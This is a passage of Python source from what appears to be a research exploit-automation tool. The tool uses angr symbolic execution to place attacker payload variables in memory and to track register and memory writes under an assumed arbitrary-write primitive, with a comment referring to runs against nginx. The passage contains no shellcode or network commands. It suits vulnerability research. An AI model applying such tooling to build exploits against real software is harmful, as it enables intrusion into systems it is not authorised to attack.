state.regs.rax,\n                'rbx' : state.regs.rbx,\n                'rcx' : state.regs.rcx,\n                'rdx' : state.regs.rdx,\n                'rsi' : state.regs.rsi,\n                'rdi' : state.regs.rdi,\n                'rbp' : state.regs.rbp,\n                'rsp' : state.regs.rsp,\n                'r8'  : state.regs.r8,\n                'r08' : state.regs.r8,\n                'r9'  : state.regs.r9,\n                'r09' : state.regs.r9,\n                'r10' : state.regs.r10,\n                'r11' : state.regs.r11,\n                'r12' : state.regs.r12,\n                'r13' : state.regs.r13,\n                'r14' : state.regs.r14,\n                'r15' : state.regs.r15,\n            }[ reg ]\n        except KeyError:\n            fatal(\"Unknown register '%s'\" % reg)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __mread(): This function reads from memory. The problem here is that we have to explicitly\n    #       specify how to interpret memory (.uint8_t, .uint32_t, etc.), according to the number\n    #       of bytes that we want to read. 
This results in cumbersome code, as we need a different\n    #       case for every possible length, so we provide a simple interface through this function.\n    #\n    # :Arg state: Current state of the symbolic execution\n    # :Arg addr: Address to read from\n    # :Arg length: Number of bytes to read\n    # :Ret: The contents of the desired memory \"area\".\n    #\n    def __mread( self, state, addr, length ):\n       # dbg_prnt(DBG_LVL_3, \"Reading %d bytes from 0x%x\" % (length, addr))\n\n        return state.memory.load(addr, length, endness=archinfo.Endness.LE)\n\n        '''\n        try:\n            return {\n                1 : state.mem[ addr ].uint8_t.resolved,\n                2 : state.mem[ addr ].uint16_t.resolved,\n                4 : state.mem[ addr ].uint32_t.resolved,\n                8 : state.mem[ addr ].uint64_t.resolved\n            }[ length ]\n        except KeyError:\n            dbg_prnt(DBG_LVL_3, \"Reading %d bytes from 0x%x\" % (length, addr))\n\n            return state.memory.load(addr, length)  # for other sizes, just use load() \n        '''\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __mwrite(): Similar to __mread() but this function writes to memory instead.\n    #\n    # :Arg state: Current state of the symbolic execution\n    # :Arg addr: Address to write to\n    # :Arg length: Number of bytes to write\n    # :Ret: None.\n    #\n    def __mwrite( self, state, addr, length, value ):\n        state.memory.store(addr, value, length, endness=archinfo.Endness.LE)\n\n        '''        \n        if   length == 1: state.mem[addr].uint8_t  = value\n        elif length == 2: state.mem[addr].uint16_t = value\n        elif length == 4: state.mem[addr].uint32_t = value\n        elif length == 8: state.mem[addr].uint64_t = value\n        else:\n            dbg_prnt(DBG_LVL_3, \"Writing %d bytes to 0x%x\" % (length, addr))\n\n            state.memory.store(addr, value, 
length)\n        '''\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __get_permissions(): Get the permissions of a memory address.\n    #\n    # :Arg state: Current state of the symbolic execution\n    # :Arg addr: Address to check\n    # :Arg length: Number of bytes to check\n    # :Ret: A string with the permissions ('R', 'W', 'X') of the address (empty on failure).\n    #\n    def __get_permissions( self, addr, length=1, state=None ):\n        if not state:                               # if no state is given, use the current one\n            state = self.__state\n\n        # TODO: check permissions for addr+1, addr+2, ... addr+length-1\n        #warn('POOL UPPER BOUND %x' % (POOLVAR_BASE_ADDR + self.__plsz))\n\n        # special cases first\n        if addr < 0x10000:\n            return ''\n\n        elif ALLOCATOR_BASE_ADDR <= addr and addr <= ALLOCATOR_CEIL_ADDR:\n            return 'RW'   \n\n        # TODO:!!! 0x10000\n        elif POOLVAR_BASE_ADDR <= addr and addr <= POOLVAR_BASE_ADDR + self.__plsz + 0x1000:\n            return 'RW'\n\n        # special case when a stack address is in the next page\n        # TODO: make it relative from STACK_BASE_ADDR\n        elif addr & 0x07ffffffffff0000 == 0x07ffffffffff0000:\n            return 'RW'\n\n\n        try:                    \n            for _, sec in  self.__proj.loader.main_object.sections_map.iteritems():\n                if sec.contains_addr(addr):                    \n                    return ('R' if sec.is_readable   else '') + \\\n                           ('W' if sec.is_writable   else '') + \\\n                           ('X' if sec.is_executable else '')\n\n            permissions = state.se.eval(state.memory.permissions(addr))\n\n            return ('R' if permissions & 4 else '') + \\\n                   ('W' if permissions & 2 else '') + \\\n                   ('X' if permissions & 1 else '')\n\n        except angr.errors.SimMemoryError:       \n            return ''                               # no permissions at all\n \n\n\n 
   # ---------------------------------------------------------------------------------------------\n    # __symv_in(): Check whether a symbolic expression contains a given symbolic variable.\n    #\n    # :Arg symexpr: The symbolic expression\n    # :Arg symv: The symbolic variable to look for\n    # :Ret: If symexpr contains symv, function returns True. Otherwise it returns False.\n    #\n    def __symv_in( self, symexpr, symv ):\n        if symexpr == None or symv == None:         # check special cases\n            return False\n            \n#        if symexpr.shallow_repr() == symv.shallow_repr(): \n#            return True\n        \n        try:\n            # treat symexpr as an AST and iterate over its leaves\n            for leaf in symexpr.recursive_leaf_asts:\n                \n                # we can't compare them directly, so we cast them into strings first\n                # (not a very \"clean\" way to do that, but it works)\n                if leaf.shallow_repr() == symv.shallow_repr():  \n                    return True                     # variable found!\n\n            return False                            # variable not found\n\n        except Exception, err:\n            # This --> BOPC.py -ddd -b eval/nginx/nginx1 -s payloads/ifelse.spl -a load -f gdb -e -1\n            # fatal('__symv_in() unexpected exception: %s' % str(err))\n\n            raise Exception('__symv_in() unexpected exception: %s' % str(err))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __alloc_un(): \"Allocate\" memory for uninitialized symbolic variables (if needed).\n    #\n    # :Arg state: Current symbolic state of the execution\n    # :Arg symv: The symbolic variable \n    # :Ret: If symv is uninitialized, function returns True; otherwise it returns False.\n    #\n    def __alloc_un( self, state, symv ):\n        if symv == None:                            # make sure that variable is valid  \n    
         return False\n\n        # This code works fine for single variables but not for expressions:\n        #\n        # # nothing to do when variable is not uninitialized (i.e. initialized)\n        # if \"{UNINITIALIZED}\" not in symv.shallow_repr():\n        #     return False\n        #\n        # # After calling __alloc_un(), a variable will still have the UNINITIALIZED keyword\n        # # even though it has a single solution. Avoid initializing a variable twice.\n        #\n        # con = state.se.eval_upto(symv, 2)           # try to get 2 solutions\n        # addr = state.se.eval(con[0])\n        #\n        # if len(con) > 1 or not (addr >= ALLOCATOR_BASE_ADDR and addr <= ALLOCATOR_CEIL_ADDR):\n        #     # initialize variable\n        addr = state.se.eval(symv)                  # try to concretize it\n\n\n        #  print '***** ALLOC UN:', hex(addr), symv\n\n        # we say < 0x1000, to catch cases with small offsets:\n        # e.g., *<BV64 Reverse(stack_16660_262144[258239:258176]) + 0x68>\n        # which gets concretized to 0x68 \n        if addr < 0x1000 or addr > 0xfffffffffffff000:\n        # if addr == 0: # < ALLOCATOR_BASE_ADDR or addr > ALLOCATOR_CEIL_ADDR\n\n            alloca = ALLOCATOR_BASE_ADDR + self.__alloc_size\n\n            # add the right constraint, to make the variable point where you want\n            # address now becomes concrete (it has exactly 1 solution)\n\n            # in case that addr > 0, make sure that symv is concretized from 0\n            # (otherwise, we'll start before self.__alloc_size)\n            x = state.se.BVS('x', 64)\n            # print 'x is ', x, alloca + addr, symv\n\n            # this indirection ensures that symv is concretized to 64 bits\n            state.add_constraints(x == alloca + addr)\n            state.add_constraints(symv == x)\n\n            # \n            # print '-->', symv, 'goes to ', hex(alloca + addr)\n\n            self.__relative[alloca] = '%s + 0x%03x' % (ALLOCATOR_NAME, 
self.__alloc_size)\n\n            \n            self.__sym[ alloca ] = symv\n\n            # shift allocator\n            self.__alloc_size += ALLOCATOR_GRANULARITY\n\n            \n            return True                             # we had an allocation            \n        \n        return False                                # no allocation\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __init_mem(): This function initializes (if needed) a memory cell. When we start execution\n    #       from an arbitrary point, it's likely that the memory cell will be empty/uninitialized.\n    #       Therefore, we need to assign a symbolic variable to it first.\n    #\n    #       A special case here is global variables from .bss and .data, which have a default value\n    #       of 0. Therefore, these variables are actually uninitialized, but instead of containing\n    #       a symbolic variable, they contain the default value (a bitvector of value 0). However,\n    #       this can cause problems to the symbolic execution, as variables are already concrete.\n    #\n    # :Arg state: Current symbolic state of the execution\n    # :Arg addr: Address of the variable\n    # :Arg length: Length of the variable\n    # :Ret: If memory was initialized, function returns True. 
Otherwise it returns False.\n    #\n    def __init_mem( self, state, addr, length=MAX_MEM_UNIT_BYTES ):\n        if addr in self.__mem:                      # memory cell is already initialized\n            return False\n\n        self.__mem[addr] = length                   # simply mark used addresses\n\n        # get ELF sections that give default values to their uninitialized variables\n        bss  = self.__proj.loader.main_object.sections_map[".bss"]\n        data = self.__proj.loader.main_object.sections_map[".data"]\n\n        # print 'INIT MEMORY', hex(addr), self.__mread(state, addr, length)\n\n\n        # if the memory cell is empty (None) or if the cell is initialized with a\n        # default value, then we should give it a symbolic variable. You can also use:\n        #       state.inspect.mem_read_expr == None:\n        #\n        if  self.__mread(state, addr, length) is None             or \\\n            bss.min_addr        <= addr and addr <= bss.max_addr  or \\\n            data.min_addr       <= addr and addr <= data.max_addr or \\\n            ALLOCATOR_BASE_ADDR <= addr and addr <= ALLOCATOR_CEIL_ADDR:\n            # bss.min_addr  <= addr and addr + length <= bss.max_addr  or \\\n            # data.min_addr <= addr and addr + length <= data.max_addr:\n\n                # Alternative: state.memory.make_symbolic('mem', addr, length << 3) (big endian)\n                symv = state.se.BVS("mem_%x" % addr, length << 3)\n\n\n                # write symbolic variable to both states (current and original)\n                self.__mwrite(state,         addr, length, symv)\n                self.__mwrite(self.__origst, addr, length, symv)\n\n                # get symbolic variable\n                self.__sym[ addr ] = self.__mread(state, addr, length)\n\n                return True                         # memory initialized\n\n\n        # if it's uninitialized, simply add its variable to the __sym table\n        # (but memory is not 
initialized at all)\n        if "{UNINITIALIZED}" in self.__mread(state, addr, length).shallow_repr():\n            self.__sym[ addr ] = self.__mread(state, addr, length)\n\n\n\n        return False                                # memory not initialized\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                          INTERNAL FUNCTIONS - EXECUTION HOOKS                           '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __dbg_read_hook(): This callback function is invoked when a memory "area" is being read.\n    #\n    # :Arg state: Current state of the symbolic execution\n    # :Ret: None.\n    #\n    def __dbg_read_hook( self, state ):\n        if self.__disable_hooks:                    # if hooks are disabled, abort\n            return\n\n        # if we read/write memory inside the hook, this operation will trigger __dbg_read_hook()\n        # again, thus resulting in an endless recursion. We need "exclusive access" here, so we\n        # disable hooks inside the function's body. 
This is pretty much like a mutex.\n        self.__disable_hooks = True\n\n        # TODO: the idea of simulation modes is not perfect\n        #   a block can modify the data unintentionally\n        #\n        # update simulation mode\n\n#        if self.__blk_start <= state.addr and state.addr < self.__blk_end:\n#            self.__sim_mode = SIM_MODE_FUNCTIONAL\n#        else:\n#            self.__sim_mode = SIM_MODE_DISPATCH\n\n        print 'state.inspect.mem_read_address', state.inspect.mem_read_address\n\n\n        # if the address is an uninitialized symbolic variable, it can point to any location;\n        # thus, when it's being evaluated it gets a value of 0. To fix this, we "allocate" some\n        # memory and we make the address point to it.\n        self.__alloc_un(state, state.inspect.mem_read_address)\n\n        # now we can safely "evaluate" the address and concretize it\n        addr = state.se.eval(state.inspect.mem_read_address)\n\n        # concretize size (newer versions of angr never set state.inspect.mem_read_length to None)\n        if state.inspect.mem_read_length is None:\n            size = MAX_MEM_UNIT_BYTES               # if size is None, set it to default\n        else:\n            size = state.se.eval(state.inspect.mem_read_length)\n\n\n        self.__init_mem(state, addr, size)          # initialize memory (if needed)\n\n\n        if state.inspect.instruction:\n            insn_addr = state.inspect.instruction\n        else:\n            insn_addr = state.addr\n\n        dbg_prnt(DBG_LVL_3, '\\t0x%08x: mem[0x%x] = %s (%x bytes)' %\n                    (insn_addr, addr, self.__mread(state, addr, size), size), pre='[R] ')\n\n\n        # make sure that the address that we read from has +R permissions\n        # TODO: fs:0x28 (canary hits an error here) 0x2010028\n        if 'R' not in self.__get_permissions(addr, state) and addr not in _whitelist_:\n            raise Exception("Attempted to read from a 
non-readable address '0x%x'" % addr)\n\n\n        self.__disable_hooks = False                # release "lock" (i.e., enable hooks again)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __dbg_write_hook(): This callback function is invoked when a memory "area" is being written.\n    #\n    # :Arg state: Current state of the symbolic execution\n    # :Ret: None.\n    #\n    def __dbg_write_hook( self, state ):\n        if self.__disable_hooks:                    # if hooks are disabled, abort\n            return\n\n        # as in __dbg_read_hook(), we need mutual exclusion here as well\n        self.__disable_hooks = True\n\n\n        # update simulation mode\n#        if self.__blk_start <= state.addr and state.addr < self.__blk_end:\n#            self.__sim_mode = SIM_MODE_FUNCTIONAL\n#        else:\n#            self.__sim_mode = SIM_MODE_DISPATCH\n\n        if state.inspect.instruction:\n            insn_addr = state.inspect.instruction\n        else:\n            insn_addr = state.addr\n\n\n        # as in __dbg_read_hook(), fix uninitialized addresses first\n        self.__alloc_un(state, state.inspect.mem_write_address)\n\n        # now we can safely "evaluate" the address and concretize it\n        addr = state.se.eval(state.inspect.mem_write_address)\n\n        # concretize size (newer versions of angr never set state.inspect.mem_write_length to None)\n        if state.inspect.mem_write_length is None:\n            size = MAX_MEM_UNIT_BYTES               # if size is None, set it to default\n        else:\n            size = state.se.eval(state.inspect.mem_write_length)\n\n\n        dbg_prnt(DBG_LVL_3, '\\t0x%08x: mem[0x%x] = %s (%x bytes)' %\n                    (insn_addr, addr, state.inspect.mem_write_expr, size), pre='[W] ')\n\n\n#        print 'BEFORE', self.__mread(state, addr, size),  state.inspect.mem_write_expr\n#        ISPO = 
state.inspect.mem_write_expr\n\n\n        if 'W' not in self.__get_permissions(addr, state) and addr not in _whitelist_:\n            raise Exception("Attempted to write to a non-writable address '0x%x'" % addr)\n\n\n        # if we are trying to write to an immutable cell, the current execution path must be discarded\n        if self.__sim_mode == SIM_MODE_DISPATCH:\n            if addr in self.__imm:\n\n                oldval = state.se.eval(state.memory.load(addr, size))\n                newval = state.se.eval(state.inspect.mem_write_expr)\n\n\n                # if the new value is the same as the old one, we're good :)\n                if oldval != newval:            # if value really changes\n                    self.__disable_hooks = False\n\n                    raise Exception("Attempted to write to immutable address '0x%x'" % addr)\n\n\n\n        if state.inspect.mem_write_expr in self.__ext:\n\n            self.__ext[ state.inspect.mem_write_expr ] = addr\n\n\n        # if it's not the 1st time that we see this address\n        if not self.__init_mem(state, addr, size):\n\n            # if address is not concretized already and it's in the symbolic variable set\n            if not isinstance(self.__mem[addr], tuple) and addr in self.__sym:\n                symv = self.__sym[ addr ]           # get symbolic variable\n\n                # check whether symbolic variable persists after write\n                if not self.__symv_in(state.inspect.mem_write_expr, symv):\n                    # The variable vanishes. 
We should concretize it now, because after\n                    # that point, the memory cell is dead; that is, it's not part of the constraints\n                    # anymore, as its original value got lost.\n                    #\n                    # To better illustrate the reason, consider the following code:\n                    #       a = input();\n                    #       if (a > 10 && a < 20) {\n                    #           a = 0;\n                    #           /* target block */\n                    #       }\n                    #\n                    # Here, if we concretize 'a' at the end of the symbolic execution it will\n                    # get a value of 0, which of course is not the desired one. The correct\n                    # approach is to concretize it right before it gets overwritten.\n\n\n                    # if variable is part of the constraints, add it to the set\n                    if self.__in_constraints(symv, state):\n                        val = state.se.eval(symv) # self.__mread(state, addr, size))\n                        self.__mem[addr] = (val, size)\n\n                        emph('Address/Value pair found: *0x%x = 0x%x (%d bytes)' %\n                                (addr, val, size), DBG_LVL_2)\n\n                    # if the contents of that cell get lost, we cannot use the AWP to write to it\n                    # anymore\n                    #\n                    # TODO: Not sure if this is correct\n                    # UPDATE: Immutables should be fine when we write them with the exact same value\n#                    for i in range(8):\n#                        self.__imm.add(addr + i)\n\n\n#        print 'AFTER', self.__mread(state, addr, size),  state.inspect.mem_write_expr\n#        self.FOO[ self.__mread(state, addr, size) ]  = ISPO\n\n        # All external inputs (sockets, file descriptors, etc.) 
should be first written somewhere\n        # in memory / registers eventually, so we can concretize them afterwards\n\n        self.__disable_hooks = False                # release "lock" (i.e., enable hooks again)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __dbg_symv_hook(): This callback function is invoked when a new symbolic variable is being\n    #       created.\n    #\n    # :Arg state: Current state of the symbolic execution\n    # :Ret: None.\n    #\n    def __dbg_symv_hook( self, state ):\n        name = state.inspect.symbolic_name          # get name of the variable\n\n        # we're only interested in symbolic variables that come from external inputs (sockets,\n        # file descriptors, etc.), as register and memory symbolic variables have already been\n        # handled.\n        if not name.startswith('mem_') and not name.startswith('reg_') \\\n            and not name.startswith('x_') and not name.startswith('cond_'):\n\n            # x and cond are our variables, so they're discarded too\n            dbg_prnt(DBG_LVL_3, " New symbolic variable '%s'" % name, pre='[S]')\n\n            self.__ext[ state.inspect.symbolic_expr ] = EXTERNAL_UNINITIALIZED\n\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __dbg_reg_wr_hook(): This callback function is invoked when a register is being modified.\n    #\n    # :Arg state: Current state of the symbolic execution\n    # :Ret: None.\n    #\n    def __dbg_reg_wr_hook( self, state ):\n        if self.__disable_hooks:                    # if hooks are disabled, abort\n            return\n\n        # as in __dbg_read_hook(), we need mutual exclusion here as well\n        self.__disable_hooks = True\n\n\n        # update simulation mode\n#        if self.__blk_start <= state.addr and state.addr < self.__blk_end:\n#            self.__sim_mode = 
SIM_MODE_FUNCTIONAL\n#        else:\n#            self.__sim_mode = SIM_MODE_DISPATCH\n        if state.inspect.instruction:\n            insn_addr = state.inspect.instruction\n        else:\n            insn_addr = state.addr\n\n        # get register name (no exceptions here)\n        regnam = state.arch.register_names[ state.inspect.reg_write_offset ]\n        if regnam in HARDWARE_REGISTERS:            # we don't care about all registers (rip, etc.)\n\n            dbg_prnt(DBG_LVL_3, '\\t0x%08x: %s = %s' %\n                        (insn_addr, regnam, state.inspect.reg_write_expr), pre='[r] ')\n\n\n            # if simulation is in dispatch mode, check whether the modified register is immutable\n            if self.__sim_mode == SIM_MODE_DISPATCH:\n\n                # print 'IMM REGS', self.__imm_regs\n                if regnam in self.__imm_regs:\n\n                    # if the new value is the same as the old one, we're good :)\n\n                    # we can concretize them as SPL registers always have integer values\n                    oldval = state.se.eval(self.__getreg(regnam))\n                    newval = state.se.eval(state.inspect.reg_write_expr)\n\n                    # if value really changes (and it has changed in the past)\n                    if oldval != newval and \\\n                        self.__getreg(regnam).shallow_repr() != self.__inireg[regnam].shallow_repr():\n                        self.__disable_hooks = False\n\n                        raise Exception("Attempted to write to immutable register '%s'" % regnam)\n\n                    else:\n                        print "immutable register '%s' overwritten with same value 0x%x" % (regnam, newval)\n\n\n            # check whether symbolic variable persists after write\n            if not self.__symv_in(state.inspect.reg_write_expr, self.__inireg[regnam]):\n                if regnam not in self.__reg:        # if register is already concretized, skip it\n                    # concretize register (after this point, its value will get lost)\n                    val = state.se.eval( self.__getreg(regnam, state) )\n\n\n                    # if register is in the constraints, it should be part of the solution.\n                    # But in any case we need the register to be in __reg, as its value is now\n                    # lost, so we don't want any further register writes to be part of the\n                    # solution.\n\n                    if self.__in_constraints(self.__inireg[regnam], state):\n                        self.__reg[ regnam ] = val\n\n                        emph('Register found: %s = %x' % (regnam, val), DBG_LVL_2)\n                    else:\n                        # make it a tuple to distinguish the 2 cases\n                        self.__reg[ regnam ] = (val,)\n\n\n        self.__disable_hooks = False                # release "lock" (i.e., enable hooks again)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __dbg_call_hook(): This callback function is invoked when a function is called.\n    #\n    # :Arg state: Current state of the symbolic execution\n    # :Ret: None.\n    #\n    def __dbg_call_hook( self, state ):\n        if self.__disable_hooks:                    # if hooks are disabled, abort\n            return\n\n        # as in __dbg_read_hook(), we need mutual exclusion here as well\n        self.__disable_hooks = True\n\n        address = state.se.eval(state.inspect.function_address)\n        name    = self.__proj.kb.functions[address].name\n\n        # This function is called to solve a difficult problem: Crashes. 
\n        # TODO: elaborate.\n\n        dbg_prnt(DBG_LVL_3, "\\tCall to '%s' found." % name, pre='[C] ')\n\n        # ---------------------------------------------------------------------\n        # FILE *fopen(const char *path, const char *mode)\n        # ---------------------------------------------------------------------\n        if name == 'fopen':\n            # print 'RDI', state.regs.rdi\n            # print 'RSI', state.regs.rsi\n\n            # if rdi is an expression then we may need to \n\n            # we work similarly to __mem_RSVPs(), but our task here is simpler\n            con_addr = state.se.eval(state.regs.rdi)\n            # print 'ADDR', hex(con_addr)\n\n            if 'W' not in self.__get_permissions(con_addr, state):\n                self.__alloc_un(state, state.regs.rdi)\n                #raise Exception("Attempted to write to a non-writable address '0x%x'" % addr)\n\n            con_addr = state.se.eval(state.regs.rdi)\n            # print 'ADDR', hex(con_addr)\n\n            name = SYMBOLIC_FILENAME\n\n\n            # if this address has already been written in the past, any writes will\n            # be overwritten, so discard the current path\n            if con_addr in self.__mem or con_addr in self.__imm or (con_addr + 7) in self.__imm:\n                raise Exception("Address 0x%x has already been written or it's immutable. 
\"\n                                \"Discard current path.\" % con_addr)\n\n            # write value byte-by-byte.\n            for i in range(len(name)):\n                self.__mwrite(state, con_addr + i, 1, name[i])\n                self.__imm.add(con_addr + i)\n\n            \n            self.__inivar_rel[ con_addr ] = name\n            self.__mem[ con_addr ] = 0\n            dbg_prnt(DBG_LVL_2, \"Writing call *0x%x = '%s'\" % (con_addr, name))\n\n\n\n        # ---------------------------------------------------------------------\n        # int _IO_getc(_IO_FILE * __fp)\n        #\n        # TODO: Delete this code, or check for uninitialized FILE*\n        # ---------------------------------------------------------------------\n        elif name == '_IO_getc': \n            # print 'RDI', state.regs.rdi\n            error('Oups!')   \n            pass\n\n        # ---------------------------------------------------------------------\n        # TODO: Do the same for others open(), strcmp() (in wuftpd) and so on\n        # ---------------------------------------------------------------------\n\n\n\n        # ---------------------------------------------------------------------\n\n        self.__disable_hooks = False                # release \"lock\" (i.e., enable hooks again)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                         INTERNAL FUNCTIONS - MEMORY MANAGEMENT                          '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __get_var_values(): Get the values of an SPL variable (there can be >1)\n    #\n    # :Arg variable: The SPL variable\n    # :Ret: The values of that variable.\n    #\n    def 
__get_var_values( self, variable ):\n        # look for the declaration of "variable" (the SPL compiler ensures its uniqueness)\n        for stmt in self.__IR:\n            if stmt['type'] == 'varset' and stmt['name'] == variable:\n                return stmt['val']\n\n        # this should never be executed\n        fatal("Searching for non-existing variable '%s'" % variable)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __pool_RSVP(): Reserve some address space in the pool, to store a variable.\n    #\n    # :Arg variable: The SPL variable\n    # :Ret: The reserved address for that variable.\n    #\n    def __pool_RSVP( self, variable ):\n        addr = POOLVAR_BASE_ADDR + self.__plsz      # make the address point to the end of the pool\n\n\n        self.__relative[ addr ] = '%s + 0x%03x' % (POOLVAR_NAME, self.__plsz)\n\n\n        # reserve some space in the pool to hold variable's values (shift down self.__plsz)\n        # (it's important as recursive calls in __init_variable_rcsv() can overwrite this space)\n        #\n        # NOTE: In the current implementation, if there are >1 values, each of them has size 8.\n        #       However, we keep the code more general (i.e. independent of the SPL compiler), so\n        #       we don't use this observation.\n        self.__plsz += sum(map(lambda v : len(v) if isinstance(v, str) else 8,\n                                self.__get_var_values(variable)))\n\n        return addr                                 # return that address\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __init_variable_rcsv(): Initialize a single SPL variable. This function writes the value(s)\n    #       for that variable in memory. There are 2 types of variables: *Free* and *Register*.\n    #       Free variables have no restrictions and therefore can be stored at any location (due\n    #       to the AWP). 
Thus we reserve a \"memory pool\" somewhere in memory and we place all free\n    #       variables there. Register variables are being passed to registers and therefore their\n    #       address must be a valid (+RW) address that is being loaded to a register in a candidate\n    #       block (they are usually on stack / heap).\n    #\n    #       SPL allows variables to get the address of another variable. That is, initializing a\n    #       variable may require to initialize another variable first, and so on. Hence this\n    #       function is recursive. For example consider the following variables (expressed in IR):\n    #       \n    #       {'type':'varset', 'uid':2, 'val':['aaa'],                                 'name':'aaa'}\n    #       {'type':'varset', 'uid':4, 'val':['\\x01\\x00...\\x00', ('aaa',)],           'name':'bbb'}\n    #       {'type':'varset', 'uid':6, 'val':['\\x02\\x00...\\x00', ('aaa',), ('bbb',)], 'name':'ccc'}\n    #       {'type':'varset', 'uid':8, 'val':[('ccc',), '\\x03\\x00...\\x00'],           'name':'ddd'}\n    #\n    #       Here initializing 'ddd', requires to initialize 'ccc' first and to initialize 'ccc' we\n    #       have to initialize 'aaa' and 'bbb', but to initialize 'bbb' we have to also initialize\n    #       'aaa'. 
The SPL compiler ensures that there are no cycles.\n    #\n    # :Arg variable: The variable to initialize\n    # :Ret: The address where the contents of this variable are stored.\n    #\n    def __init_variable_rcsv( self, variable, depth=0 ):\n        dbg_prnt(DBG_LVL_3, "Initializing variable '%s' (depth: %d)" % (variable, depth))\n\n        # ---------------------------------------------------------------------\n        # Find the address for that variable\n        # ---------------------------------------------------------------------\n        if variable in self.__vartab:               # register/used variable?\n            addr = self.__vartab[ variable ]        # variable should be placed at a given location\n\n            if addr in self.__inivar:               # if variable has already been initialized\n                dbg_prnt(DBG_LVL_3, "'%s' is already initialized." % variable)\n                return addr                         # just return it\n\n\n            # addr can be a number, like 0x7ffffffffff01a0, or a string (dereference)\n            # like "*<BV64 0x7ffffffffff0020>" or "*<BV64 rsi_713_64 + 0x18>".\n            #\n            # If the address gets dereferenced (*X), we store the values into the pool\n            # and write the pool's address into X (indirect) at runtime.\n            if isinstance(addr, str):               # is addr a dereference?\n                addr = self.__pool_RSVP(variable)   # make address point to the pool\n                self.__vartab[ variable ] = addr    # and add it to the vartab\n\n        else:\n            # Variable is not in the vartab => Free. 
That is, the variable can be stored\n            # at any memory location, so we place it on the pool\n            addr = self.__pool_RSVP(variable)\n            self.__vartab[ variable ] = addr\n\n\n        # ---------------------------------------------------------------------\n        # Store the values to that address\n        # ---------------------------------------------------------------------\n        orig_addr = addr                            # get a backup as address is being modified\n        values    = ''                              # concatenated values\n        relvals   = []                              # values in the relative form\n\n        for val in self.__get_var_values(variable): # for each value\n\n            if isinstance(val, tuple):\n                # Value is a reference to another variable. Recursively initialize that\n                # variable or get its address if it's already initialized. Recursion\n                # always halts, as the SPL compiler ensures that variables aren't used before\n                # they are initialized, so the following cases can't happen:\n                #       int x = {&x};\n                #       int a = {&b}; int b = 10;\n\n                # find the address for that variable and pack it\n                address = self.__init_variable_rcsv( val[0], depth+1 )\n                val     = struct.pack("<Q", address)\n\n                relvals.append( address )           # relative value is an address\n\n            else:\n                relvals.append( val )               # relative value is a string\n\n\n            # at this point, value is a string (the SPL compiler 'packs' integers)\n\n            values += val\n\n\n        # write value byte-by-byte. 
Memory address must be immutable;\n        # any writes to it are not allowed\n        for i in range(len(values)):\n            self.__state.memory.store(addr + i, values[i])\n\n            # check if it's already immutable\n            if addr + i in self.__imm:\n                raise Exception('Attempted to write an RSVP to an immutable address')\n\n\n            self.__imm.add(addr + i)\n\n        self.__inivar[ addr ] = values          # mark address as initialized        \n        self.__inivar_rel[ addr ] = relvals     # values in the relative-form \n\n        addr += len(val)                        # and then shift index to the next value\n        print 'INIVAR_REL:', hex(addr), relvals      \n\n        dbg_prnt(DBG_LVL_3, \"Done. '%s' has been initialized at 0x%x\" % (variable, orig_addr))\n\n        return orig_addr                            # return variable's original address\n        \n\n\n    # ---------------------------------------------------------------------------------------------\n    # __init_vars(): Initialize the variables of the SPL payload. 
This function is essentially a\n    #       wrapper of __init_variable_rcsv().\n    #\n    # :Arg varmap: The current variable mapping\n    # :Ret: None.\n    #\n    def __init_vars( self, varmap ):\n        dbg_prnt(DBG_LVL_2, 'Initializing SPL variables...')\n\n        self.__vartab     = dict(varmap[:])         # create a dictionary out of varmap\n        self.__plsz       = 0                       # our pool size\n        self.__inivar     = { }                     # initialized memory locations\n        self.__inivar_rel = { }                     # values in the relative-form\n\n\n        for var, addr in varmap:                    # for each SPL variable\n            self.__init_variable_rcsv(var)          # recursively store it in memory\n                                                    # and update self.__vartab\n\n        # ---------------------------------------------------------------------\n        # Memory has been initialized. Print out variables (debugging only)\n        # ---------------------------------------------------------------------\n        dbg_prnt(DBG_LVL_2, 'Done. Pool Size: %s. Variable(s) memory layout:' % bold(self.__plsz))\n\n        for addr, val in sorted(self.__inivar.iteritems()):\n            dbg_prnt(DBG_LVL_2, '  %16x <- %s' % (addr, ' '.join(['%02x' % ord(v) for v in val])))\n\n        # self.__vartab shows the address that each variable has been stored at\n        dbg_arb(DBG_LVL_3, 'Variable Table:',\n                                ['%s:0x%x' % (n,v) for n, v in self.__vartab.iteritems()])\n\n        del self.__inivar                         # we don't need this guy anymore\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __mem_RSVPs(): Initialize reserved memory locations that are being used as dereferences.\n    #       This function is the continuation of __init_vars(). 
The problem here is that the\n    #       address of an RSVP may change during the symbolic execution, or may be unknown until\n    #       we reach the actual statement. For example:\n    #\n    #           UID:8       addr = [rsi + 10]\n    #\n    #       Here, rsi may be set at UID:6, so we don't know the address of [rsi + 10] and hence\n    #       we cannot write a dereference, before we reach statement with UID:8. \n    #\n    #       This function is invoked right before the execution of an accepted block and writes\n    #       any dereferences \"on the fly\". We have to be careful though, as these addresses may\n    #       be already written (we can't use AWP to set them at the beginning of the execution), \n    #       or marked as immutable. In both cases, reservation fails.\n    #\n    #\n    # :Arg state: Current state of the symbolic execution    \n    # :Arg cur_blk: Current basic block address\n    # :Arg cur_uid: Current statement UID\n    # :Ret: If reservation is successful, function returns True. If for some reason reservation \n    #       fails, False is returned.\n    #\n    def __mem_RSVPs( self, state, cur_blk, cur_uid ):\n        dbg_prnt(DBG_LVL_2, \"Applying memory RSVPs ...\")\n\n        # this is a static-style local variable\n        if '_simulate__reserved_syms' not in self.__dict__:\n            self.__reserved_syms = set()            # previous registers that were used in RSVPs\n\n\n     